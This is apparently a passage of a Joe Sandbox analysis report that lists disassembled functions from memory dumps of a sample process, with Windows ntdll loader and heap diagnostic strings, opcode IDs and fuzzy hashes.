                                                                                          • LdrpProtectedCopyMemory, xrefs: 2A0C4DF4
                                                                                          • ***Exception thrown within loader***, xrefs: 2A0C4E27
                                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 2A0C4DF5
                                                                                          • LdrpGenericExceptionFilter, xrefs: 2A0C4DFC
                                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 2A0C4E38
                                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 2A0C4E06
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-2973941816
                                                                                          • Opcode ID: caead725e07c7997bb12249a18a74ebc9bd04ce31d49dac6e1b113f03cda74a9
                                                                                          • Instruction ID: 773d2805ae29f9203d340753b5b735529cb0a45c06d9ae0b6cf8aec1c12db139
                                                                                          • Opcode Fuzzy Hash: caead725e07c7997bb12249a18a74ebc9bd04ce31d49dac6e1b113f03cda74a9
                                                                                          • Instruction Fuzzy Hash: FF215E731802017BE714BB6CACA9E3E7BDEFB855A4F120171F31196546E961DE00C62D
                                                                                          Function 2A04EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                          • API String ID: 0-1109411897
                                                                                          • Opcode ID: c1315c1e97a5027180571fd61f6e1c52272e28847c5d1fa5c7f54ff35b160270
                                                                                          • Instruction ID: 80b858d5f87ed31e6ae61bf5dc13232e6d96a15a41e8411672ddb9af560fdd5b
                                                                                          • Opcode Fuzzy Hash: c1315c1e97a5027180571fd61f6e1c52272e28847c5d1fa5c7f54ff35b160270
                                                                                          • Instruction Fuzzy Hash: 38A25674E056298FDB64EF58C898B9EB7B1BF45700F1142FADA09A7291DB719E81CF00
                                                                                          Function 2A04ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                          • API String ID: 0-4098886588
                                                                                          • Opcode ID: 001618322e4582eacb3087751e708098c28dab88f64b1615adbd4e56aa77d63d
                                                                                          • Instruction ID: e1dc12a887ec82d9a4554d0a6cbf5f3b561b3118824b9f0cf2138cfb291a58f7
                                                                                          • Opcode Fuzzy Hash: 001618322e4582eacb3087751e708098c28dab88f64b1615adbd4e56aa77d63d
                                                                                          • Instruction Fuzzy Hash: 7E32DC79D042699BDB21EF54C894BDEBBB5BF46340F1040FAEA48A7252DB719F818F40
                                                                                          Function 00402870 Relevance: 7.8, Strings: 6, Instructions: 273COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000001.1773094379.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_1_400000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <$VUUU$^$gfff$gfff$yxxx
                                                                                          • API String ID: 0-316815425
                                                                                          • Opcode ID: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                          • Instruction ID: acdc47fa774a7f9690a8a9d900611673f9bdcf880e58a562d9d8aaaed250525f
                                                                                          • Opcode Fuzzy Hash: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                          • Instruction Fuzzy Hash: 6B81D471B005054BDF2CCD5DDA987AA73A6EBD4304F28817AD809EF3D1EA799E058A44
                                                                                          Function 2A0763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-792281065
                                                                                          • Opcode ID: d1fa369dae7933839adbe1e53653f8134137eb955dba2548884f42c325c98bad
                                                                                          • Instruction ID: 53544e26630c9cdc5ed773fbe374c10ab0c01589179c820e725122a435e012f6
                                                                                          • Opcode Fuzzy Hash: d1fa369dae7933839adbe1e53653f8134137eb955dba2548884f42c325c98bad
                                                                                          • Instruction Fuzzy Hash: 99912671A41320ABDB14FF90DD84B6E7BF0AF64B34F010578D611AB282E779DA01D799
                                                                                          Function 2A072CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 2A0B2706
                                                                                          • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 2A0B279C
                                                                                          • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 2A0B276F
                                                                                          • .Local\, xrefs: 2A072D91
                                                                                          • \WinSxS\, xrefs: 2A072E23
                                                                                          • @, xrefs: 2A072E4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                          • API String ID: 0-3926108909
                                                                                          • Opcode ID: c462f94ef7cdf1e32ef4c470f13f7ab648c12a52110c213e5deda335c4475de8
                                                                                          • Instruction ID: 26408fd8d1c2addd45ccc422f3f48da03d250538cbb55d371db117ebffb36c3d
                                                                                          • Opcode Fuzzy Hash: c462f94ef7cdf1e32ef4c470f13f7ab648c12a52110c213e5deda335c4475de8
                                                                                          • Instruction Fuzzy Hash: 1881BAB11043419FDB11EF14C890A6BF7F8AF9D700F41896EF994CB246E274DA44CBA6
                                                                                          Function 2A08096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 2A082DF0: LdrInitializeThunk.NTDLL ref: 2A082DFA
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080BA3
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080BB6
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080D60
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080D74
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 1404860816-0
                                                                                          • Opcode ID: 46ae7141db42ebeaff554ae0264d788ae33cecdc108634e8100d8107d69002e7
                                                                                          • Instruction ID: f7c32dcfd6a2d5cf59883f1f6a6c8823380ea6b7bd001ed5947445049c2e77b2
                                                                                          • Opcode Fuzzy Hash: 46ae7141db42ebeaff554ae0264d788ae33cecdc108634e8100d8107d69002e7
                                                                                          • Instruction Fuzzy Hash: E6425CB1900715DFDB60DF68C990B9AB7F4BF08310F1445A9E999EB242E770EA84CF64
                                                                                          Function 2A0C4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                          • API String ID: 0-2518169356
                                                                                          • Opcode ID: 11d028494bddb2bfc39ba348db59c806e7320478c59b2d915e411c6dbddd8fef
                                                                                          • Instruction ID: e19fd3468bd25ef8a92913b3fa1ce4462cac843df9898080d78814bbf36c6b5c
                                                                                          • Opcode Fuzzy Hash: 11d028494bddb2bfc39ba348db59c806e7320478c59b2d915e411c6dbddd8fef
                                                                                          • Instruction Fuzzy Hash: ED91D076D40619DBCB21DF98C881AAEB7F2FF48310F654169E901EB351E775EA01CB90
                                                                                          Function 2A04A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                          • API String ID: 0-379654539
                                                                                          • Opcode ID: 0fd14094066dc40c9dc068eae80c0fd9107c17ed35fc2b1768d8d121b9725f3c
                                                                                          • Instruction ID: 50f8ae51e1d767837384beb7b2d12545ddd1c731f9da206e2b9d04917f6ff99a
                                                                                          • Opcode Fuzzy Hash: 0fd14094066dc40c9dc068eae80c0fd9107c17ed35fc2b1768d8d121b9725f3c
                                                                                          • Instruction Fuzzy Hash: 0EC179B4908382DFD711EF5AC140B5EB7E4BF88704F00497AFA958B252E778CA45DB62
                                                                                          Function 2A050C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 2A0A54D1, 2A0A5592
                                                                                          • HEAP: , xrefs: 2A0A54E0, 2A0A55A1
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 2A0A54ED
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 2A0A55AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          • API String ID: 0-1657114761
                                                                                          • Opcode ID: 19d3392178eeb8506a08d6c2fbb1094049d22ce36d68a1f57336ef6e19b5b2e7
                                                                                          • Instruction ID: b051add7e00ef5134431dd320b89d0d4851ee4952290e85b4eb8918eaaec9216
                                                                                          • Opcode Fuzzy Hash: 19d3392178eeb8506a08d6c2fbb1094049d22ce36d68a1f57336ef6e19b5b2e7
                                                                                          • Instruction Fuzzy Hash: 5EA1F130A00606AFD724EF24D490FAEBBE1FF56304F148579D99A8B682D774F944CBA1
                                                                                          Function 2A074AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 2A0B3437
                                                                                          • RtlDeactivateActivationContext, xrefs: 2A0B3425, 2A0B3432, 2A0B3451
                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 2A0B3456
                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 2A0B342A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                          • API String ID: 0-1245972979
                                                                                          • Opcode ID: b0810b65521f97dedb968822833514c6c81bbe4a6373e3af2e94b6bf44f18abe
                                                                                          • Instruction ID: e3d144bbedd8d5e6484c52fabcec2fdffbd99ac565ed7b26f452c95fe08d5906
                                                                                          • Opcode Fuzzy Hash: b0810b65521f97dedb968822833514c6c81bbe4a6373e3af2e94b6bf44f18abe
                                                                                          • Instruction Fuzzy Hash: 07612432A40B11AFC312EF18DD81B6AB3E5EF80750F2189B9E9549B641D775FD00CB9A
                                                                                          Function 2A074D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpFindDllActivationContext, xrefs: 2A0B3636, 2A0B3662
                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 2A0B365C
                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2A0B362F
                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 2A0B3640, 2A0B366C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                          • API String ID: 0-3779518884
                                                                                          • Opcode ID: fcc0bd3c4b653e28128d785c18b3d55b7cfdb002c7d1b9113f763690a1bfe3e5
                                                                                          • Instruction ID: 6b56b74506f30f999d71961fc5c59c0a8ff18bc41ee39bc06b02bef5e4734106
                                                                                          • Opcode Fuzzy Hash: fcc0bd3c4b653e28128d785c18b3d55b7cfdb002c7d1b9113f763690a1bfe3e5
                                                                                          • Instruction Fuzzy Hash: 92310B72D00611AEDB21FB44DC88F69B3F8EB01754F038176DA84A7551D7B6EE80C69E
                                                                                          Function 2A0529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 2A053255
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2A05327D
                                                                                          • HEAP: , xrefs: 2A053264
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          • API String ID: 0-617086771
                                                                                          • Opcode ID: b646b4638dddebad20235375b80dee81f25dff3bd3e2aa6d64068889b1d355d1
                                                                                          • Instruction ID: dec2941303578c73db3c8684ca3c1072ba021e4b03bb10e4c51662bcf6bfe26b
                                                                                          • Opcode Fuzzy Hash: b646b4638dddebad20235375b80dee81f25dff3bd3e2aa6d64068889b1d355d1
                                                                                          • Instruction Fuzzy Hash: 2692CA71E042489FDB25DFA8D450BAEBBF1FF08300F1580A9E989AB392D774A941CF51
                                                                                          Function 2A066962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $@
                                                                                          • API String ID: 0-1077428164
                                                                                          • Opcode ID: b943658b33ae572c881e0b343844a16d3103daeff5dc1fda2194b0d15c62d0f7
                                                                                          • Instruction ID: ce8d02d48dcf32e89bb201ba1921f4333c2d8182db4036c8a8c8413e7736b9da
                                                                                          • Opcode Fuzzy Hash: b943658b33ae572c881e0b343844a16d3103daeff5dc1fda2194b0d15c62d0f7
                                                                                          • Instruction Fuzzy Hash: 53C29D71A08341DFD765DF64C880B9FBBE5AF88B48F05892DFA8987242D774E904CB52
                                                                                          Function 2A060BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpCheckModule, xrefs: 2A0AA117
                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 2A0AA10F
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2A0AA121
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-161242083
                                                                                          • Opcode ID: aa9adde4df84c6387c8100aa404104befff31e53af7efc50f8abd811ee1e6422
                                                                                          • Instruction ID: dc9ae5628910e592d4da4e7a341aaaced698184d053b110bf00ffb111d48f75b
                                                                                          • Opcode Fuzzy Hash: aa9adde4df84c6387c8100aa404104befff31e53af7efc50f8abd811ee1e6422
                                                                                          • Instruction Fuzzy Hash: 6771D271A40205EFDB14EFA8C980EAEB7F4FB48728F158479D911EB252E774AE41CB50
                                                                                          Function 2A050A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-1334570610
                                                                                          • Opcode ID: e57101a5bfff260a4c84e2cd13ec573ab2bdf82810c478e181a422177c4cd07f
                                                                                          • Instruction ID: cc98317cc164edfce6a6435fdac25c6bf0288e7a238b19d7adf373c7fccf29f7
                                                                                          • Opcode Fuzzy Hash: e57101a5bfff260a4c84e2cd13ec573ab2bdf82810c478e181a422177c4cd07f
                                                                                          • Instruction Fuzzy Hash: FD61BB71600301EFE728EF24D480B6EBBE1FF45304F15856AE9598B296D7B0E981CB91
                                                                                          Function 2A03CCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • @, xrefs: 2A03CD63
                                                                                          • InstallLanguageFallback, xrefs: 2A03CD7F
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 2A03CD34
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                          • API String ID: 0-1757540487
                                                                                          • Opcode ID: 00f9554ea7900bc6c12f0f43029524c47a5513337dcfcfd699ed53a0170d4a38
                                                                                          • Instruction ID: c4cce3a2ef77d75e399d6ee58240fac74571b10c76f2075c89c6a7e2e4ea8103
                                                                                          • Opcode Fuzzy Hash: 00f9554ea7900bc6c12f0f43029524c47a5513337dcfcfd699ed53a0170d4a38
                                                                                          • Instruction Fuzzy Hash: 835103B65043469BC700EF65D444BABB7E8AF88B14F01093EFA85D7240E734DA49D7A2
                                                                                          Function 2A0D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                          • API String ID: 0-1373925480
                                                                                          • Opcode ID: 5a51ad8d7e83ab023268dc0d0f5aee52725c320b838d91718309764150f4fd14
                                                                                          • Instruction ID: b517f22c831b1030169348161a895a66a6f08f952d678f87d161ab807e9ff707
                                                                                          • Opcode Fuzzy Hash: 5a51ad8d7e83ab023268dc0d0f5aee52725c320b838d91718309764150f4fd14
                                                                                          • Instruction Fuzzy Hash: D0412437980B58CBEB29EBA4D850BADB7F8FF55340F11046AD901EB3A2D7769901CB11
                                                                                          Function 2A050BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-2558761708
                                                                                          • Opcode ID: 3de37b1e9530f10b951409dbdc3049909817d89da3af1e5f9968f0173d5c4dd0
                                                                                          • Instruction ID: a0914560d05f028d95afd5309075b916ff4724daef33c8de7f8e34b901e6c508
                                                                                          • Opcode Fuzzy Hash: 3de37b1e9530f10b951409dbdc3049909817d89da3af1e5f9968f0173d5c4dd0
                                                                                          • Instruction Fuzzy Hash: E111EE32395001AFE758FA24D880F6EB3A5FF4162AF15812AEA06CF256DB34E840C751
                                                                                          Function 2A0C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpInitializationFailure, xrefs: 2A0C20FA
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2A0C2104
                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 2A0C20F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2986994758
                                                                                          • Opcode ID: 63e48da7d9f473f5f878f14a67e9db7008461cc1055367421ac68353c3837375
                                                                                          • Instruction ID: 0355f8e526d9fea02f4c84d13f1c572de71cddbd47bfd70000da182b76e91926
                                                                                          • Opcode Fuzzy Hash: 63e48da7d9f473f5f878f14a67e9db7008461cc1055367421ac68353c3837375
                                                                                          • Instruction Fuzzy Hash: 2DF028316402086BE710FB88CC82FAD77A9EB48B54F400074FB40B7681E1B4AA00C641
                                                                                          Function 2A0503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: #%u
                                                                                          • API String ID: 48624451-232158463
                                                                                          • Opcode ID: 636e46d47e05157f66c85951343252959959ba8e32df4e7d8de6ef525281fe16
                                                                                          • Instruction ID: 09ff5e81a7e536617f78e2754b361a274ee3628c0aae6e89629cec0d920b6afc
                                                                                          • Opcode Fuzzy Hash: 636e46d47e05157f66c85951343252959959ba8e32df4e7d8de6ef525281fe16
                                                                                          • Instruction Fuzzy Hash: 62714CB5A001499FDB01EFA8D990FAEB7F8FF08704F154065E905E7252EA34EE41CB61
                                                                                          Function 2A0CCEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 2A0CCFBD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallFilterFunc@8
                                                                                          • String ID: @
                                                                                          • API String ID: 4062629308-2766056989
                                                                                          • Opcode ID: 92cd6b1b2e4a10e1a3920906e1bf3b3c9502ccaf51d1cc1e2602a2f30df3bd1c
                                                                                          • Instruction ID: 27f17d31b958e14a61ae13478d720567540bd70ee1f841aabeb3e607e13d87ba
                                                                                          • Opcode Fuzzy Hash: 92cd6b1b2e4a10e1a3920906e1bf3b3c9502ccaf51d1cc1e2602a2f30df3bd1c
                                                                                          • Instruction Fuzzy Hash: 4F41B472900214EFCB21EF99D840A6EBBF9FF58710F11407AE914DB265E734D941CB69
                                                                                          Function 2A04A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrResSearchResource Exit, xrefs: 2A04AA25
                                                                                          • LdrResSearchResource Enter, xrefs: 2A04AA13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                          • API String ID: 0-4066393604
                                                                                          • Opcode ID: 61ed1003f6d4e3b26bf179b652a7747693b6422c3659a334cbcad4932b323db5
                                                                                          • Instruction ID: a2248e0ab4f6c07a88baefa6a8ed80770249c7cf3077d76dd0490e3eab617be1
